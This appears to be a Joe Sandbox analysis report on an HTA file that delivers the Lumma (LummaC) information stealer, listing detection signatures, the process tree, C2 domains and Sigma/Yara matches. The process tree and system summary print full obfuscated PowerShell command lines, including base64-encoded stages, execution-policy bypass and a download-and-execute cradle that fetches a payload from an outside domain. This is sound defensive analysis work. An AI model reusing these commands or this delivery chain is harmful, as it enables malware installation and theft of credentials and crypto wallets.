Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
web55.mp4.hta

Overview

General Information

Sample name:web55.mp4.hta
Analysis ID:1585911
MD5:888e63b183a6eb78b5e205a1be94dadb
SHA1:a7561a7bd2aec16f4aa414b4427767bd071adbf1
SHA256:1fd2a20e4495bd158b7572dd2b9fa6ab69d9c129e630cdc26bf8f26850a99100
Tags:htaLummaStealeruser-lontze7
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
.NET source code contains very large array initializations
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
LummaC encrypted strings found
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to modify clipboard data
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 6976 cmdline: mshta.exe "C:\Users\user\Desktop\web55.mp4.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 7324 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ep Unrestricted -w 1 sc $env:Temp\a.ps1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gS0ZiQygkS3lHWXJVVUQpew0KKCgkS3lHWXJVVUQgLXNwbGl0ICcoPzw9XEcuLiknfCV7JEVKdXAuU3ViU3RyaW5nKDMsMTAwKVskX119KSAgLWpvaW4gJycgLXJlcGxhY2UgIi4kIil9OyRFSnVwID0naWV4bXZ7dU4xaUtGZSJBT0V1Vnk1Im9ZezZQbFBhLzphYjRJWi5PYjJxLTdXO0NkSFxneFF3L016SkFqcnQzQDZCfUROJX5UblUofTBRc3NfaCVoSWZrKWM5WEw4NCNAUnlTKm9HcDY1MDk1ODM0NDEwOTM2NDMyNDA2MDk2OTU4Jw==')));cmd.exe /k start powershell -w 1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtZW5jIFV3QjBBR0VBY2dCMEFDMEFVQUJ5QUc4QVl3QmxBSE1BY3dBZ0FDSUFRd0E2QUZ3QVZ3QnBBRzRBWkFCdkFIY0Fjd0JjQUZNQWVRQnpBRmNBYndCM0FEWUFOQUJjQUZjQWFRQnVBR1FBYndCM0FITUFVQUJ2QUhjQVpRQnlBRk1BYUFCbEFHd0FiQUJjQUhZQU1RQXVBREFBWEFCd0FHOEFkd0JsQUhJQWN3Qm9BR1VBYkFCc0FDNEFaUUI0QUdVQUlnQWdBQzBBUVFCeUFHY0FkUUJ0QUdVQWJnQjBBRXdBYVFCekFIUUFJQUFpQUMwQWR3QWdBR2dBYVFCa0FHUUFaUUJ1QUNBQUxRQmxBSEFBSUFCaUFIa0FjQUJoQUhNQWN3QWdBQzBBYmdCdkFIQUFJQUF0QUVNQWJ3QnRBRzBBWVFCdUFHUUFJQUJnQUNJQWFRQmxBSGdBSUFBb0FDZ0FUZ0JsQUhjQUxRQlBBR0lBYWdCbEFHTUFkQUFnQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCREFHd0FhUUJsQUc0QWRBQXBBQzRBUkFCdkFIY0FiZ0JzQUc4QVlRQmtBRk1BZEFCeUFHa0FiZ0JuQUNnQUp3Qm9BSFFBZEFCd0FITUFPZ0F2QUM4QWR3QmxBR0lBTGdCckFHd0FhUUJ3QUdRQWVRQjNBRzhBZWdCcEFIa0FMZ0J6QUdnQWJ3QndBQzhBYXdCMUFHNEFiZ0JoQUhJQUxnQndBRzRBWndBbkFDa0FLUUJnQUNJQUlnQWdBQzBBVndCcEFHNEFaQUJ2QUhjQVV3QjBBSGtBYkFCbEFDQUFTQUJwQUdRQVpBQmxBRzRBOy4gJGVudjpUZW1wXGEucHMxOyBmdW5jdGlvbiBLeUdZclVVRCgpe2Z1bmN0aW9uIGV6cENNZGhHUSgkckhQZWIpe2lmKCEoVGVzdC1QYXRoIC1QYXRoICRUaEJFWHBpVk8pKXtjdXJsIChLRmJDICRySFBlYikgLW8gJFRoQkVYcGlWT319fUt5R1lyVVVEOw=='))) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7460 cmdline: "C:\Windows\system32\cmd.exe" /k start powershell -w 1 "powershell -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A;. $env:Temp\a.ps1; function KyGYrUUD(){function ezpCMdhGQ($rHPeb){if(!(Test-Path -Path $ThBEXpiVO)){curl (KFbC $rHPeb) -o $ThBEXpiVO}}}KyGYrUUD;" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • powershell.exe (PID: 7476 cmdline: powershell -w 1 "powershell -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A;. $env:Temp\a.ps1; function KyGYrUUD(){function ezpCMdhGQ($rHPeb){if(!(Test-Path -Path $ThBEXpiVO)){curl (KFbC $rHPeb) -o $ThBEXpiVO}}}KyGYrUUD;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7604 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • powershell.exe (PID: 7700 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://web.klipdywoziy.shop/kunnar.png'))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 7508 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe (PID: 6680 cmdline: "C:\Users\user~1\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe" MD5: 89470385FDDACB118DEB7A7941E6A666)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["femalsabler.shop", "soundtappysk.shop", "quinceisoz.cam", "versersleep.shop", "robinsharez.shop", "apporholis.shop", "handscreamny.shop", "crowdwarek.shop", "chipdonkeruz.shop"], "Build id": "WG6I6S--web55"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      Process Memory Space: powershell.exe PID: 7324INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x4eebd:$b2: ::FromBase64String(
      • 0x4f07b:$b2: ::FromBase64String(
      • 0x4f56c:$b2: ::FromBase64String(
      • 0x4f72c:$b2: ::FromBase64String(
      • 0x9deab:$b2: ::FromBase64String(
      • 0x9e069:$b2: ::FromBase64String(
      • 0x9e583:$b2: ::FromBase64String(
      • 0x9e743:$b2: ::FromBase64String(
      • 0x9fc08:$b2: ::FromBase64String(
      • 0x9fdc8:$b2: ::FromBase64String(
      • 0x11e6a7:$b2: ::FromBase64String(
      • 0x11e865:$b2: ::FromBase64String(
      • 0x11ed57:$b2: ::FromBase64String(
      • 0x11ef17:$b2: ::FromBase64String(
      • 0x1230a4:$b2: ::FromBase64String(
      • 0x12326a:$b2: ::FromBase64String(
      • 0x1275e5:$b2: ::FromBase64String(
      • 0x1277a5:$b2: ::FromBase64String(
      • 0x12f4a3:$b2: ::FromBase64String(
      • 0x12f669:$b2: ::FromBase64String(
      • 0x13d05c:$b2: ::FromBase64String(
      Process Memory Space: powershell.exe PID: 7604JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 7700JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Process Memory Space: powershell.exe PID: 7700INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0x3c3684:$b2: ::FromBase64String(
          • 0xc7d091:$b2: ::FromBase64String(
          • 0x3c32e8:$s1: -join
          • 0xa8de75:$s1: -join
          • 0xa9af4a:$s1: -join
          • 0xa9e31c:$s1: -join
          • 0xa9e9ce:$s1: -join
          • 0xaa04bf:$s1: -join
          • 0xaa26c5:$s1: -join
          • 0xaa2eec:$s1: -join
          • 0xaa375c:$s1: -join
          • 0xaa3e97:$s1: -join
          • 0xaa3ec9:$s1: -join
          • 0xaa3f11:$s1: -join
          • 0xaa3f30:$s1: -join
          • 0xaa4780:$s1: -join
          • 0xaa48fc:$s1: -join
          • 0xaa4974:$s1: -join
          • 0xaa4a07:$s1: -join
          • 0xaa4c6d:$s1: -join
          • 0xaa6e03:$s1: -join
          Process Memory Space: powershell.exe PID: 7508JoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            amsi32_7604.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_7700.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ep Unrestricted -w 1 sc $env:Temp\a.ps1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gS0ZiQygkS3lHWXJVVUQpew0KKCgkS3lHWXJVVUQgLXNwbGl0ICcoPzw9XEcuLiknfCV7JEVKdXAuU3ViU3RyaW5nKDMsMTAwKVskX119KSAgLWpvaW4gJycgLXJlcGxhY2UgIi4kIil9OyRFSnVwID0naWV4bXZ7dU4xaUtGZSJBT0V1Vnk1Im9ZezZQbFBhLzphYjRJWi5PYjJxLTdXO0NkSFxneFF3L016SkFqcnQzQDZCfUROJX5UblUofTBRc3NfaCVoSWZrKWM5WEw4NCNAUnlTKm9HcDY1MDk1ODM0NDEwOTM2NDMyNDA2MDk2OTU4Jw==')));cmd.exe /k start powershell -w 1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtZW5jIFV3QjBBR0VBY2dCMEFDMEFVQUJ5QUc4QVl3QmxBSE1BY3dBZ0FDSUFRd0E2QUZ3QVZ3QnBBRzRBWkFCdkFIY0Fjd0JjQUZNQWVRQnpBRmNBYndCM0FEWUFOQUJjQUZjQWFRQnVBR1FBYndCM0FITUFVQUJ2QUhjQVpRQnlBRk1BYUFCbEFHd0FiQUJjQUhZQU1RQXVBREFBWEFCd0FHOEFkd0JsQUhJQWN3Qm9BR1VBYkFCc0FDNEFaUUI0QUdVQUlnQWdBQzBBUVFCeUFHY0FkUUJ0QUdVQWJnQjBBRXdBYVFCekFIUUFJQUFpQUMwQWR3QWdBR2dBYVFCa0FHUUFaUUJ1QUNBQUxRQmxBSEFBSUFCaUFIa0FjQUJoQUhNQWN3QWdBQzBBYmdCdkFIQUFJQUF0QUVNQWJ3QnRBRzBBWVFCdUFHUUFJQUJnQUNJQWFRQmxBSGdBSUFBb0FDZ0FUZ0JsQUhjQUxRQlBBR0lBYWdCbEFHTUFkQUFnQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCREFHd0FhUUJsQUc0QWRBQXBBQzRBUkFCdkFIY0FiZ0JzQUc4QVlRQmtBRk1BZEFCeUFHa0FiZ0JuQUNnQUp3Qm9BSFFBZEFCd0FITUFPZ0F2QUM4QWR3QmxBR0lBTGdCckFHd0FhUUJ3QUdRQWVRQjNBRzhBZWdCcEFIa0FMZ0J6QUdnQWJ3QndBQzhBYXdCMUFHNEFiZ0JoQUhJQUxnQndBRzRBWndBbkFDa0FLUUJnQUNJQUlnQWdBQzBBVndCcEFHNEFaQUJ2QUhjQVV3QjBBSGtBYkFCbEFDQUFTQUJwQUdRQVpBQmxBRzRBOy4gJGVudjpUZW1wXGEucHMxOyBmdW5jdGlvbiBLeUdZclVVRCgpe2Z1bmN0aW9uIGV6cENNZGhHUSgkckhQZWIpe2lmKCEoVGVzdC1QYXRoIC1QYXRoICRUaEJFWHBpVk8pKXtjdXJsIChLRmJDICRySFBlYikgLW8gJFRoQkVYcGlWT319fUt5R1lyVVVEOw=='))), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ep Unrestricted -w 1 sc $env:Temp\a.ps1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gS0ZiQygkS3lHWXJVVUQpew0KKCgkS3lHWXJVVUQgLXNwbGl0ICcoPzw9XEcuLiknfCV7JEVKdXAuU3ViU3RyaW5nKDMsMTAwKVskX119KSAgLWpvaW4gJycgLXJlcGxhY2UgIi4kIil9OyRFSnVwID0naWV4bXZ7dU4xaUtGZSJBT0V1Vnk1Im9ZezZQbFBhLzphYjRJWi5PYjJxLTdXO0NkSFxneFF3L016SkFqcnQzQDZCfUROJX5UblUofTBRc3NfaCVoSWZrKWM5WEw4NCNAUnlTKm9HcDY1MDk1ODM0NDEwOTM2NDMyNDA2MDk2OTU4Jw==')));cmd.exe /k start powershell -w 1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtZW5jIFV3QjBBR0VBY2dCMEFDMEFVQUJ5QUc4QVl3QmxBSE1BY3dBZ0FDSUFRd0E2QUZ3QVZ3QnBBRzRBWkFCdkFIY0Fjd0JjQUZNQWVRQnpBRmNBYndCM0FEWUFOQUJjQUZjQWFRQnVBR1FBYndCM0FITUFVQUJ2QUhjQVpRQnlBRk1BYUFCbEFHd0FiQUJjQUhZQU1RQXVBREFBWEFCd0FHOEFkd0JsQUhJQWN3Qm9BR1VBYkFCc0FDNEFaUUI0QUdVQUlnQWdBQzBBUVFCeUFHY0FkUUJ0QUdVQWJnQjBBRXdBYVFCekFIUUFJQUFpQUMwQWR3QWdBR2dBYVFCa0FHUUFaUUJ1QUNBQUxRQmxBSEFBSUFCaUFIa0FjQUJoQUhNQWN3QWdBQzBBYmdCdkFIQUFJQUF0QUVNQWJ3QnRBRzBBWVFCdUFHUUFJQUJnQUNJQWFRQmxBSGdBSUFBb0FDZ0FUZ0JsQUhjQUxRQlBBR0lBYWdCbEFHTUFkQUFnQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCREFHd0FhUUJsQUc0QWRBQXBBQzRBUkFC
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ep Unrestricted -w 1 sc $env:Temp\a.ps1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gS0ZiQygkS3lHWXJVVUQpew0KKCgkS3lHWXJVVUQgLXNwbGl0ICcoPzw9XEcuLiknfCV7JEVKdXAuU3ViU3RyaW5nKDMsMTAwKVskX119KSAgLWpvaW4gJycgLXJlcGxhY2UgIi4kIil9OyRFSnVwID0naWV4bXZ7dU4xaUtGZSJBT0V1Vnk1Im9ZezZQbFBhLzphYjRJWi5PYjJxLTdXO0NkSFxneFF3L016SkFqcnQzQDZCfUROJX5UblUofTBRc3NfaCVoSWZrKWM5WEw4NCNAUnlTKm9HcDY1MDk1ODM0NDEwOTM2NDMyNDA2MDk2OTU4Jw==')));cmd.exe /k start powershell -w 1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtZW5jIFV3QjBBR0VBY2dCMEFDMEFVQUJ5QUc4QVl3QmxBSE1BY3dBZ0FDSUFRd0E2QUZ3QVZ3QnBBRzRBWkFCdkFIY0Fjd0JjQUZNQWVRQnpBRmNBYndCM0FEWUFOQUJjQUZjQWFRQnVBR1FBYndCM0FITUFVQUJ2QUhjQVpRQnlBRk1BYUFCbEFHd0FiQUJjQUhZQU1RQXVBREFBWEFCd0FHOEFkd0JsQUhJQWN3Qm9BR1VBYkFCc0FDNEFaUUI0QUdVQUlnQWdBQzBBUVFCeUFHY0FkUUJ0QUdVQWJnQjBBRXdBYVFCekFIUUFJQUFpQUMwQWR3QWdBR2dBYVFCa0FHUUFaUUJ1QUNBQUxRQmxBSEFBSUFCaUFIa0FjQUJoQUhNQWN3QWdBQzBBYmdCdkFIQUFJQUF0QUVNQWJ3QnRBRzBBWVFCdUFHUUFJQUJnQUNJQWFRQmxBSGdBSUFBb0FDZ0FUZ0JsQUhjQUxRQlBBR0lBYWdCbEFHTUFkQUFnQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCREFHd0FhUUJsQUc0QWRBQXBBQzRBUkFCdkFIY0FiZ0JzQUc4QVlRQmtBRk1BZEFCeUFHa0FiZ0JuQUNnQUp3Qm9BSFFBZEFCd0FITUFPZ0F2QUM4QWR3QmxBR0lBTGdCckFHd0FhUUJ3QUdRQWVRQjNBRzhBZWdCcEFIa0FMZ0J6QUdnQWJ3QndBQzhBYXdCMUFHNEFiZ0JoQUhJQUxnQndBRzRBWndBbkFDa0FLUUJnQUNJQUlnQWdBQzBBVndCcEFHNEFaQUJ2QUhjQVV3QjBBSGtBYkFCbEFDQUFTQUJwQUdRQVpBQmxBRzRBOy4gJGVudjpUZW1wXGEucHMxOyBmdW5jdGlvbiBLeUdZclVVRCgpe2Z1bmN0aW9uIGV6cENNZGhHUSgkckhQZWIpe2lmKCEoVGVzdC1QYXRoIC1QYXRoICRUaEJFWHBpVk8pKXtjdXJsIChLRmJDICRySFBlYikgLW8gJFRoQkVYcGlWT319fUt5R1lyVVVEOw=='))), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ep Unrestricted -w 1 sc $env:Temp\a.ps1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gS0ZiQygkS3lHWXJVVUQpew0KKCgkS3lHWXJVVUQgLXNwbGl0ICcoPzw9XEcuLiknfCV7JEVKdXAuU3ViU3RyaW5nKDMsMTAwKVskX119KSAgLWpvaW4gJycgLXJlcGxhY2UgIi4kIil9OyRFSnVwID0naWV4bXZ7dU4xaUtGZSJBT0V1Vnk1Im9ZezZQbFBhLzphYjRJWi5PYjJxLTdXO0NkSFxneFF3L016SkFqcnQzQDZCfUROJX5UblUofTBRc3NfaCVoSWZrKWM5WEw4NCNAUnlTKm9HcDY1MDk1ODM0NDEwOTM2NDMyNDA2MDk2OTU4Jw==')));cmd.exe /k start powershell -w 1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtZW5jIFV3QjBBR0VBY2dCMEFDMEFVQUJ5QUc4QVl3QmxBSE1BY3dBZ0FDSUFRd0E2QUZ3QVZ3QnBBRzRBWkFCdkFIY0Fjd0JjQUZNQWVRQnpBRmNBYndCM0FEWUFOQUJjQUZjQWFRQnVBR1FBYndCM0FITUFVQUJ2QUhjQVpRQnlBRk1BYUFCbEFHd0FiQUJjQUhZQU1RQXVBREFBWEFCd0FHOEFkd0JsQUhJQWN3Qm9BR1VBYkFCc0FDNEFaUUI0QUdVQUlnQWdBQzBBUVFCeUFHY0FkUUJ0QUdVQWJnQjBBRXdBYVFCekFIUUFJQUFpQUMwQWR3QWdBR2dBYVFCa0FHUUFaUUJ1QUNBQUxRQmxBSEFBSUFCaUFIa0FjQUJoQUhNQWN3QWdBQzBBYmdCdkFIQUFJQUF0QUVNQWJ3QnRBRzBBWVFCdUFHUUFJQUJnQUNJQWFRQmxBSGdBSUFBb0FDZ0FUZ0JsQUhjQUxRQlBBR0lBYWdCbEFHTUFkQUFnQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCREFHd0FhUUJsQUc0QWRBQXBBQzRBUkFC
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://web.klipdywoziy.shop/kunnar.png'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://web.klipdywoziy.shop/kunnar.png'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7604, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://web.klipdywoziy.shop/kunnar.png'))" , ProcessId: 7700, ProcessName: powershell.exe
